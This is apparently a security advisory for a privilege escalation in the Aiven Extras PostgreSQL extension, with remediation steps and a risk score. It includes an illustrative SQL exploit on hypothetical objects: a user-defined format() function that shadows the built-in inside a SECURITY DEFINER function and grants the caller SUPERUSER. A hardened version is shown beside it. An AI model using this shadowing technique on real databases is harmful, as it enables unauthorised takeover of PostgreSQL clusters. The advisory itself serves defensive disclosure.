Aiven Extras PostgreSQL Extension Privilege Escalation Vulnerability

Vulnerability

A privilege escalation vulnerability has been identified in the Aiven Extras PostgreSQL extension in versions prior to 1.1.15. It allows a database user to elevate their privileges to superuser in any PostgreSQL database that has the Aiven Extras extension installed. The root cause is that a call to the format function inside the extension is not schema-prefixed (pg_catalog.format). PostgreSQL resolves an unqualified function name through the search_path, which the calling session controls, so a user who can create a function named format with matching argument types in a schema on that path can have their own function executed instead of the built-in one, and it then runs with the privileges of the extension function that called it.
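The following is an added illustration of this weakness class, written for this page; it is not aiven_extras code and does not reproduce the extension's actual function. The schema admin_tools, the functions purge_table_unsafe and purge_table_safe, and the role lowpriv are hypothetical. It shows a SECURITY DEFINER function that calls format() unqualified, an ordinary user shadowing that call with a format(text, text) of their own, and the hardened form that pins search_path and qualifies the call. The shadowing works because PostgreSQL keeps the candidate with the most exact argument-type matches, so a user-defined format(text, text) beats pg_catalog.format(text, VARIADIC "any") for a (literal, text) call regardless of where the user's schema sits on the path.

```sql
-- Added illustration, not aiven_extras code. All object names are hypothetical.

-- === As a superuser: a helper that runs with its owner's privileges. ===
-- Weak pattern: search_path is not pinned and format() is not schema-qualified.
CREATE SCHEMA admin_tools;
GRANT USAGE ON SCHEMA admin_tools TO PUBLIC;

CREATE FUNCTION admin_tools.purge_table_unsafe(tbl text)
RETURNS void LANGUAGE plpgsql SECURITY DEFINER AS $$
BEGIN
    -- Unqualified format(): resolved through the caller's search_path.
    EXECUTE format('TRUNCATE TABLE %I', tbl);
END $$;
-- EXECUTE on functions is granted to PUBLIC by default, so any role can call it.

-- === As the ordinary role "lowpriv", which owns schema "lowpriv". ===
CREATE TABLE lowpriv.scratch (id int);   -- a table the call can truncate without error

-- Same name as the built-in, argument types (text, text) matching the call exactly.
CREATE FUNCTION lowpriv.format(fmt text, arg text)
RETURNS text LANGUAGE plpgsql AS $$
BEGIN
    -- When reached from purge_table_unsafe this body runs as the definer
    -- (a superuser); session_user is still the ordinary caller.
    EXECUTE 'ALTER ROLE ' || pg_catalog.quote_ident(session_user) || ' SUPERUSER';
    RETURN pg_catalog.format(fmt, arg);  -- preserve the expected result
END $$;

SET search_path = lowpriv, pg_catalog;
SELECT admin_tools.purge_table_unsafe('scratch');
-- At this point the role "lowpriv" has been granted SUPERUSER.

-- === Hardened form (as the superuser). ===
-- Pin search_path for the function body and qualify every catalog call, so the
-- caller's search_path cannot influence name resolution. Taking a regclass
-- resolves the table in the caller's context and prints it schema-qualified.
CREATE FUNCTION admin_tools.purge_table_safe(tbl regclass)
RETURNS void LANGUAGE plpgsql SECURITY DEFINER
SET search_path = pg_catalog, pg_temp AS $$
BEGIN
    EXECUTE pg_catalog.format('TRUNCATE TABLE %s', tbl);
END $$;
```

Pinning search_path on the function already removes lowpriv.format from the candidate set for this call; qualifying the call as pg_catalog.format additionally protects code paths that run under some other search_path. Both are the pattern the PostgreSQL documentation recommends for SECURITY DEFINER functions.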

Impact

Exploitation of this vulnerability allows an authenticated database user to obtain superuser privileges in a PostgreSQL database using the Aiven Extras extension. A superuser role has unrestricted access to every object in the cluster, so this amounts to full compromise of the database.

Remediation

Users are advised to upgrade to version 1.1.16 of the Aiven Extras PostgreSQL extension. Installing the new package on the server does not change the version of an extension that is already installed in a database, so after upgrading it is necessary to run ALTER EXTENSION aiven_extras UPDATE TO '1.1.16' in each database where Aiven Extras is installed.
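The following is an added example of how to check and apply the per-database update; it is not from the Aiven Extras project. It uses only standard PostgreSQL catalog views and functions, and must be run as a role allowed to alter the extension (typically its owner) in each database.

```sql
-- Added example, not from the Aiven Extras project.

-- 0. pg_extension is per-database: list the databases to visit (run once,
--    then connect to each with psql -d <datname> and run steps 1-4).
SELECT datname FROM pg_catalog.pg_database WHERE datallowconn ORDER BY 1;

-- 1. Version installed in THIS database vs. the version the server's package
--    provides (default_version comes from the extension's control file).
--    installed_version IS NULL means the extension is not installed here.
SELECT name, installed_version, default_version
FROM pg_catalog.pg_available_extensions
WHERE name = 'aiven_extras';

-- 2. Confirm an upgrade path from the installed version to 1.1.16 exists on
--    this server before attempting the update.
SELECT source, target
FROM pg_catalog.pg_extension_update_paths('aiven_extras')
WHERE source = (SELECT extversion FROM pg_catalog.pg_extension
                WHERE extname = 'aiven_extras')
  AND target = '1.1.16'
  AND path IS NOT NULL;

-- 3. Apply the update named in the advisory (fails if no path exists).
ALTER EXTENSION aiven_extras UPDATE TO '1.1.16';

-- 4. Verify.
SELECT extname, extversion
FROM pg_catalog.pg_extension
WHERE extname = 'aiven_extras';
```

If step 1 shows a default_version below 1.1.16, the server package itself has not been upgraded yet and ALTER EXTENSION will not find the update script; upgrade the package first, then repeat the steps.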

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 7.5
exploitability: 5.5
remediation: 7.7
relevance: 0.0
threat: 3.2
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.